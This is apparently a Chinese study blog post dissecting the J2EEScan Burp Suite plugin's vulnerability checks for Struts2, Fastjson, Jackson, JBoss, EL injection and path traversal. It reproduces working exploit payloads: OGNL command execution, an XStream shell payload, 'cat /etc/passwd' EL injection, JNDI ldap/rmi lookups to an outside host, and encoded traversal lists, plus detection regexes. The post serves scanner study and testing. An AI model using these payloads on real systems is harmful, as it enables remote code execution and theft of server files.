http://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/

【10】ApacheStrutsS2016(表达式注入)-(S2-016)

这里准备了两个payload

payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27id%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");
        payloads.add("${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{%27cmd.exe%27,%27/c%20ipconfig.exe%27}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}");

一个是适配linux一个是windows
简单看看payload语法

${
    #a=(new java.lang.ProcessBuilder(new java.lang.String[]{'cmd.exe','/c ipconfig.exe'})).start(),
    #b=#a.getInputStream(),
    #c=new java.io.InputStreamReader(#b),
    #d=new java.io.BufferedReader(#c),
    #e=new char[50000],
    #d.read(#e),
    #matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),
    #matt.getWriter().println(#e),
    #matt.getWriter().flush(),
    #matt.getWriter().close()
    }	

对比看下正常java 调用java.lang.ProcessBuilder执行命令的实例

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
 
 
public class ProcessTest {
	public static void main(String args[]) {
		
		ProcessBuilder pb = new ProcessBuilder();
		pb.command(new String[] { cmd });
		try {
			Process process = pb.start();
			InputStream stdout = process.getInputStream();
			InputStreamReader isr = new InputStreamReader(stdout);
			BufferedReader br = new BufferedReader(isr);
			String line = null;
			while ( (line = br.readLine()) != null)
			System.out.println(line);
			int exitVal = process.waitFor();
			System.out.println(exitVal);
		} catch (IOException e) {
			e.printStackTrace();
		} catch (InterruptedException e) {
			e.printStackTrace();
		}
	}
}


实际也就是增加了一个httprsp的回显,比较清晰
上面的payload循环放到参数,如下参数都有可能存在漏洞

List<String> redirectMeth = new ArrayList();
        redirectMeth.add("action:");
        redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");

因为我们的payload希望是长成这样

redirect:xxxxx

所以要做一个替换,这里是因为前面只需要remove所有其他参数,剩下的第一个等于号应该是我们加入的这个参数和payload中间。

String utf8rawRequest = new String(rawrequest, "UTF-8");
modifiedRawRequest = utf8rawRequest.replaceFirst("=", "").getBytes();

如果match到

 static {
        DETECTION_REGEX.add(Pattern.compile("Subnet Mask", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("uid=[0-9]+.*gid=[0-9]+.*", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE));
        DETECTION_REGEX.add(Pattern.compile("java\\.lang\\.(UNIX)", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

subnet mask是网关的意思,匹配的是win
第三个没太理解,有可能是Win执行了linux的表达式抛出来的异常?

【11】ApacheStrutsS2017-S2-017

参数较016 少了redirect:

       redirectMeth.add("redirect:");
        redirectMeth.add("redirectAction:");

payload

       rawrequest = callbacks.getHelpers().addParameter(rawrequest,
                        callbacks.getHelpers().buildParameter(redir, "http://www.example.com/%23", IParameter.PARAM_URL)
                );

这里竟然没有恶意参数,知识一个跳转
match返回的状态码和header头

  if (statusCode >= 300 && statusCode < 400) {
                          if (header.substring(header.indexOf(":") + 1).trim().startsWith("http://www.example.com/")) {

看起来s2 017就是个URL跳转
https://www.cnblogs.com/jinqi520/p/10813737.html

【12】ApacheStrutsS2020 - S2-020

参数

modifiedRawRequest = callbacks.getHelpers().addParameter(rawrequest,
                callbacks.getHelpers().buildParameter("Class.classLoader.URLs[0]",
                        classLoaderStringTest, IParameter.PARAM_URL)
        );

payload

long unixTime = System.currentTimeMillis() / 1000L;
        String classLoaderStringTest = "testClassloaderManipulation" + unixTime;

match返回包

    private static final Pattern CLASSLOADER_PM = Pattern.compile("Invalid field value for field|No result defined for action",

这个漏洞原理是支持使用classLoader
可以看这篇
struts自定义的classloadr

class.classLoader.resources.dirContext.docBase

【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第3张图片
这里有两种绕过姿势

  • class[‘classLoader’]
  • Class.classloader
    问题正则
(.*\.|^)class\..*  两种都能绕过
(.*\.|^)(class|Class)(\.|\[).* 中括号可以绕过

安全正则

(.*\.|^|.*|\[('|"))(c|C)lass(\.|('|")]|\[).*

【13】ApacheStrutsS2032 - S2-032

老样子,去除所有参数

     byte[] rawrequest = baseRequestResponse.getRequest();
        //Remove URI parameters
        for (IParameter param : parameters) {
            rawrequest = callbacks.getHelpers().removeParameter(rawrequest, param);
        }

入参

method:

payload

%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23kzxs%3d%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2c%23kzxs.print(%23parameters.hook[0])%2c%23kzxs.print(new%20java.lang.Integer(829%2b9))%2c%23kzxs.close(),1%3f%23xx%3a%23request.toString

展开看看

#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,
#kzxs=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),
#kzxs.print(#parameters.hook[0]),
#kzxs.print(new java.lang.Integer(829+9)),
#kzxs.close(),1?
#xx:
#request.toString

第一步:从表达式上解释设置context中_memberAccess值为ognl.OgnlContext的属性DEFAULT_MEMBER_ACCESS的值.(SecurityMemberAccess 比较严格限制了反射类,DefaultMemberAccess不限制反射类),后面直接调用反射就行。
其中hook[0]是后面的参数

modifiedRawRequest = callbacks.getHelpers().addParameter(modifiedRawRequest,
                    callbacks.getHelpers().buildParameter("hook", "HOOK_VAL", IParameter.PARAM_URL)
            );

match,因为print了俩,一个是HOOK_VAL,一个是表达式计算的值。

private static final Pattern DYNAMIC_METHOD_INVOCATION = Pattern.compile("HOOK_VAL838",
            Pattern.DOTALL | Pattern.MULTILINE);

【14】ApacheStrutsS2043 - S2-043(Config Browser插件泄露)

遍历path

private static final List<String> BROWSER_PATHS = Arrays.asList(
            "/config-browser/actionNames",
            "/config-browser/actionNames.action"
    );

请求之后match

private static final byte[] GREP_STRING = "Actions in namespace".getBytes();

【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第4张图片

【15】ApacheStrutsS2052-S2-052

首先判断了有没有content-type

        String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");

毕竟payload要靠xml传过去
增加content-type

        List<String> headersWithContentTypeXML = HTTPParser.addOrUpdateHeader(headers, "Content-type", "application/xml");

payload

String payload = " ping " + currentCollaboratorPayload;

        String xmlMarshallingBody= "\n" +
            "  \n" +
            "    \n" +
            "      0\n" +
            "      \n" +
            "        \n" +
            "          \n" +
            "            \n" +
            "              \n" +
            "                false\n" +
            "                0\n" +
            "                \n" +
            "                  \n" +
            "                    \n" +
            "                    \n" +
            "                      \n" +
            "                        /bin/sh-c " + payload + "\n" +
            "                      \n" +
            "                      false\n" +
            "                    \n" +
            "                  \n" +
            "                  \n" +
            "                    \n" +
            "                      java.lang.ProcessBuilder\n" +
            "                      start\n" +
            "                      \n" +
            "                    \n" +
            "                    foo\n" +
            "                  \n" +
            "                  foo\n" +
            "                \n" +
            "                \n" +
            "              \n" +
            "              \n" +
            "              \n" +
            "              false\n" +
            "              0\n" +
            "              0\n" +
            "              false\n" +
            "            \n" +
            "            false\n" +
            "          \n" +
            "          \n" +
            "        \n" +
            "        0\n" +
            "      \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "  \n" +
            "    \n" +
            "    \n" +
            "  \n" +
            "";
        
    
        

这个payload和之前的有所不同,查一下漏洞原理:
使用Struts2 REST插件的XStream组件反序列化操作没有校验。
https://blog.csdn.net/qq_44312507/article/details/103585253
match的话match
collaboratorContext的接收值就行。

【16】ApacheStrutsShowcase

ApacheStrutsShowcase
关键路劲

   private static final List<String> STRUTS_SHOWCASE_PATHS = Arrays.asList(
            "/struts2-showcase/showcase.action"
    );

如果match到

private static final byte[] GREP_STRING = "Struts2 Showcase".getBytes();

则存在问题

看上去这个showcase.action在多个S2系列的漏洞中出现,比较容易出问题。
https://www.anquanke.com/post/id/86757

【16】ApacheStrutsWebConsole

控制台路径

private static final List<String> STRUTS_WEBCONSOLE_PATHS = Arrays.asList(
            "/struts/webconsole.html?debug=console"
    );

如果match到

private static final byte[] GREP_STRING = "title>OGNL Console".getBytes();

则存在问题
长这样
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第5张图片
但是有利用条件
只有在开启了Debug模式且ClassPath中使用了struts2-dojo-plugin-*.jar的情况下,webconsole.html页面才有可能存在安全漏洞的风险。
https://www.secpulse.com/archives/48383.html

【17】ApacheWicketArbitraryResourceAccess 目录穿越漏洞

路径包含

"wicket/resource")

payload则是替换掉上面的路径
换成

    private static final List<String> PAYLOADS = Arrays.asList(
            "wicket/resource/int/wicket.properties,/bla/ HTTP",
            "wicket/resources/int/wicket.properties,/bla/ HTTP"
    );

这里采用的是替换原始请求包正则匹配

                byte[] wicketRequest = helpers.stringToBytes(plainRequest.replaceFirst("wicket\\/resource.*? HTTP", payload));

match则是

    private static final byte[] GREP_STRING = "initializer=".getBytes();

百度竟然没有找到相关漏洞解释
去apache看看
https://issues.apache.org/jira/browse/WICKET-4427
看出来了,是目录穿越

public ExtensionResourceNameIterator(String path, final String extension)
    {
        if ((extension == null) && (path.indexOf('.') != -1))
        {
// Get the extension from the path provided
            extensions = new String[] { "." + Strings.lastPathComponent(path, '.') };
            path = Strings.beforeLastPathComponent(path, '.');
        }
        else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }
        else
        {
            extensions = new String[1];
            extensions[0] = ".";
        }

        this.path = path;
        index = 0;
    }

注意这个分支

else if (extension != null)
        {
// Extension can be a comma separated list
            extensions = Strings.split(extension, ',');
            for (int i = extensions.length - 1; i >= 0; i--)
            {
                extensions[i] = extensions[i].trim();
                if (!extensions[i].startsWith("."))
                {
                    extensions[i] = "." + extensions[i];
                }
            }
        }

相当于根据,取了多个后缀然后拼接造成了路径穿越。

【18】EL3Injection EL 3.0/Lambda Injection EL表达式注入

payload

   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "System.getProperties()".getBytes()
    );            
     

直接post请求发过去

            byte[] checkRequest = insertionPoint.buildRequest(INJ_TEST);
            IHttpRequestResponse checkRequestResponse = callbacks.makeHttpRequest(
                    baseRequestResponse.getHttpService(), checkRequest);

match到

    private static final byte[] GREP_STRING = "java.vendor".getBytes();  
    

则存在漏洞
这是直接执行命令??
match的是命令结果
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第6张图片
看了下文章
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第7张图片
不太现实,是指用户的输入直接传入了elp.eval执行

【19】ELInjection EL (Expression Language) Injection

payload

        byte[] EL_TEST = "(new+java.util.Scanner((T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\").getInputStream()),\"UTF-8\")).useDelimiter(\"\\\\A\").next()".getBytes();

拆分一下

a = T(java.lang.Runtime).getRuntime().exec(\"cat+/etc/passwd\")
b = a.getInputStream()
c = new java.util.Scanner(b,utf)
d = c.useDelimiter(\"\\\\A\")
e = d.next()

match的话就matchpasswd,这个判断不好,既然都是exec,为何不用ping这种跨平台的命令或者echo。

第二中payload

     HashMap<byte[], byte[]> EL_INJECTIONS = new HashMap<byte[], byte[]>() {
            {
                put("${applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put("#{applicationScope}".getBytes(), "javax.servlet.context".getBytes());
                put(String.format("${%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("#{%d*%d}", firstInt, secondInt).getBytes(), multiplication.getBytes());
                put(String.format("{{%d*%d}}", firstInt, secondInt).getBytes(), multiplication.getBytes());
            }
        };

key是payload,value是响应包的match
EL表达式
https://xz.aliyun.com/t/7692

【20】FastJsonRCE CVE 2017-18349

payload

    // https://github.com/jas502n/fastjson-1.2.61-RCE
        List<String> PAYLOADS = new ArrayList<>();
        PAYLOADS.add("{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/obj\",\"autoCommit\":true}");
        PAYLOADS.add("{\"@type\":\"org.apache.commons.configuration2.JNDIConfiguration\",\"prefix\":\"ldap://%s:80/ExportObject\"}");
        PAYLOADS.add("{\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://%s:80/ExportObject\",\"autoCommit\":true}}");
        PAYLOADS.add("{\"a\":{ \"@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},\"b\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://%s:80/ExportObject\",\"autoCommit\":true}}");

记得改content-type

 String contentTypeHeader = HTTPParser.getRequestHeaderValue(reqInfo, "Content-type");
        if (contentTypeHeader != null && !contentTypeHeader.contains("json")) {

match dnslog即可

collaboratorContext

分析看这个吧
http://xxlegend.com/2018/10/23/基于JdbcRowSetImpl的Fastjson%20RCE%20PoC构造与分析/

【21】Htaccess - .htaccess泄露

这个也要做一个插件impl?
请求"/.htaccess"; match private static final byte[] GREP_STRING = "RewriteEngin".getBytes();

【22】HTTPProxy

看着是比较老的洞了
在这里插入图片描述
说是connect 协议走http协议,代理到其他网站就可以绕过https的限制
发送

            byte[] rawrequestHTTPConnect = "CONNECT http://www.google.com/humans.txt HTTP/1.0\r\n\r\n".getBytes();

match

private static final byte[] GREP_STRING = "Google is built by a large".getBytes();

这国内没法检测,建议重写个http的链接。

【23】HTTPWeakPassword 弱口令

先判断返回包

        String wwwAuthHeader = getResponseHeaderValue(respInfo, "WWW-Authenticate");

是不是401

        if (responseCode == 401 && wwwAuthHeader != null) {

这个走的是之前提到的TOMCAT弱口令那个类

HTTPBasicBruteforce
credentials = wp.getCredentials();

在这里插入图片描述

【24】IDocInjection - CVE-2013-3770任意文件读取

Oracle IDoc 13年爆出的漏洞
payload

   private static final List<byte[]> EL_INJECTION_TESTS = Arrays.asList(
            "<$fileName=\"../../../../../../../../../../../etc/passwd\"$><$executeService(\"GET_LOGGED_SERVER_OUTPUT\")$><$ServerOutput$>".getBytes());

match

            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

【25】InfrastructurePathTraversal 目录穿越绕waf

这个就是通用型的一个绕waf
payload1

 private static final List<String> UTF8_LFI_PATHS = Arrays.asList(
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c",
            "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c",
            "/%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\",
            "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af",
            "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/",
            "/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af",
            "/%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af%25c0%25ae%25c0%25ae%25c0%25af",
            "/..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c..%c1%9c",
            "/%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\%c0%ae%c0%ae\\",
            "/%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c%c0%ae%c0%ae%c1%9c",
            "/%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\%25c0%25ae%25c0%25ae\\",
            "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f",
            "/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "/%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f",
            "/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/",
            "/..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\",
            "/..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../..../",
            "%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2/%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2./%c2.%c2",
            "/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "/static/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f",
            "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\",
            "....//....//....//....//....//....//....//....//"
    );

payload2

      {
            put("etc/passwd", Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
            put("windows\\win.ini", Pattern.compile("for 16\\-bit app support", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
        }

12拼接
match的值在payload2里面

【26】JacksonDataBindCVE20177525

payload

        PAYLOADS.add("{\"param\":[\"org.springframework.context.support.FileSystemXmlApplicationContext\",\"http://%s/spel.xml\"]}");

match dnslog 就行

远程代码执行
这个spel.xml内容里面可以自定义命令

 xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 xsi:schemaLocation="
 http://www.springframework.org/schema/beans
 http://www.springframework.org/schema/beans/spring-beans.xsd
">
 <bean id="pb" class="java.lang.ProcessBuilder">
 <constructor-arg value="/Applications/Calculator.app/Contents/MacOS/Calculator" />
 <property name="whatever" value="#{ pb.start() }"/>
 </bean>
</beans>

【27】JavascriptSSRF - ReactJS SSRF

payload

String payload = "fetch('https://%s')";

match dnslog
这个fetch 不仅仅可以打http协议的 file协议的也可以

【28】JavaServerFacesTraversal

payload

List<String> jsfTraversal = new ArrayList<>();
        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.jsf");
        jsfTraversal.add("javax.faces.resource.../WEB-INF/web.xml.xhtml");
        jsfTraversal.add("javax.faces.resource./WEB-INF/web.xml.jsf?ln=..");
        jsfTraversal.add("javax.faces.resource/…\\\\WEB-INF/web.xml"); 
        jsfTraversal.add("jenia4faces/template/../WEB-INF/web.xml/ ");
        
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?ln=..\\\\WEB-INF");
        jsfTraversal.add("/faces/javax.faces.r`eso`urce/..\\\\WEB-INF/web.xml");
        jsfTraversal.add("/faces/javax.faces.resource/web.xml?loc=../WEB-INF");

match到下面就证明能读取到。

    static {
        DETECTION_REGEX.add(Pattern.compile("javax.faces.", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));
    }

【29】JBossAdminConsole

先fuzz目录

 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/admin-console/login.seam;jsessionid=4416F53DDE1DBC8081CDBDCDD1666FB0"
    );

match返回包

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "JBoss AS Admin"</span><span class="token punctuation">.</span><span class="token function">getBytes</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">,</span>
            <span class="token string">"<title>JBoss AS 6 Admin Console".getBytes(),
            "JBoss EAP Admin Console".getBytes(),
            "Embedded Jopr Core".getBytes()
    );

则认为是控制台泄露

然后match是否有登录表单

    private static final Pattern VIEWSTATE_PATTERN = Pattern.compile("id=\"javax.faces.ViewState\" value=\"(.*?)\"");

然后就可以进行弱口令爆破了

【30】testJBossSEAMAdminCVE20101871

如果存在控制台
则可以接着尝试CVE20101871
这是一个模板注入

payload

headers.add("POST " + JBOSS_ADMIN_PATHS.get(0) + " HTTP/1.1");
        headers.add("Host: " + url.getHost() + ":" + url.getPort());
        headers.add("Content-Type: application/x-www-form-urlencoded");
        headers.add("Cookie: JSESSIONID=4416F53DDE1DBC8081CDBDCDD1666FB0");

        String body = "actionOutcome=/success.xhtml?user%3d%23{expressions.getClass().forName('java.lang.Runtime').getDeclaredMethod('getRuntime')}";

比较老的漏洞seam组件中插入#{payload}进行模板注入,

match的是反射获取的类。这里可以改成更无害一点的payload,例如随机数相加。

java
    private static final byte[] GREP_STRING_CVE20101871 = "public+static+java.lang.Runtime+java.lang.Runtime.getRuntime".getBytes();

【31】JBossjBPMAdminConsole

JBoss jBPM Admin Console

请求path

    private static final List<String> JBOSS_jBPM_PATHS = Arrays.asList(
            "/jbpm-console/app/tasks.jsf"
    );

match

    private static final List<byte[]> GREP_STRINGS = Arrays.asList(
            "JBoss jBPM Administration Console".getBytes()
    );

【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第8张图片

【32】 JBossJMXInvoker RCE

漏洞path

    private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/EJBInvokerServlet",
            "/invoker/JMXInvokerServlet"
    );   

match

    private static final byte[] GREP_STRING = "org.jboss.invocation.MarshalledValue".getBytes();

是个反序列化,判定的是能不能下载
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第9张图片

【33】JBossJMXReadOnly - RCE

路径

private static final List<String> JBOSS_INVOKER_PATHS = Arrays.asList(
            "/invoker/readonly"
    );

匹配

    private static final byte[] GREP_STRING = "org.jboss.invocation.http.servlet.ReadOnlyAccessFilter".getBytes();

这是个命令执行
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第10张图片

【34】JBossJuddi

路径

private static final List<String> JBOSS_WS = Arrays.asList(
            "/juddi/"
    );

match

 private static final byte[] GREP_STRING = ">JBoss JUDDI".getBytes();

只能说明 JBoss Juddi console 控制台泄露,不能证明有漏洞

【35】JBossWebConsole

路径

 private static final List<String> JBOSS_ADMIN_PATHS = Arrays.asList(
            "/web-console/",
            "/jmx-console/"
    );

match

    private static final byte[] GREP_STRING_JMX = "HtmlAdaptor?action=displayMBeans".getBytes();
    private static final byte[] GREP_STRING_WEB = "ServerInfo.jsp\"".getBytes();

一个是web路径 一个jmx路径
这种如果管理员没有配置账号密码,则存在未授权,因为是管理WEB的,所以直接RCE。
在这里插入图片描述

【36】JBossWS

路径

private static final List<String> JBOSS_WS = Arrays.asList(
            "/jbossws/services"
    );

match

    private static final Pattern JBOSSWS_RE = Pattern.compile("JBossWS/Services
", Pattern.CASE_INSENSITIVE | Pattern.MULTILINE);

这个会暴露所有的web服务,也属于控制台泄露,信息收集。

【37】JettyRemoteLeakage

payload

    private static final byte[] INJ_TEST = {(byte) 0};

发送一个byte
match

    private static final byte[] GREP_STRING = "400 Illegal character 0x0 in state".getBytes();

Jetty web server 远程共享缓冲区信息泄漏漏洞
【BurpSuite】插件开发学习之J2EEScan - 汇总篇(主动+被动1-76)_第11张图片
原理大概是错误信息把缓冲区的东西带出来了。

【38】JKStatus

路径

    private static final List<String> JK_ENDPOINTS = Arrays.asList(
            "/jk-status",
            "/jkstatus-auth",
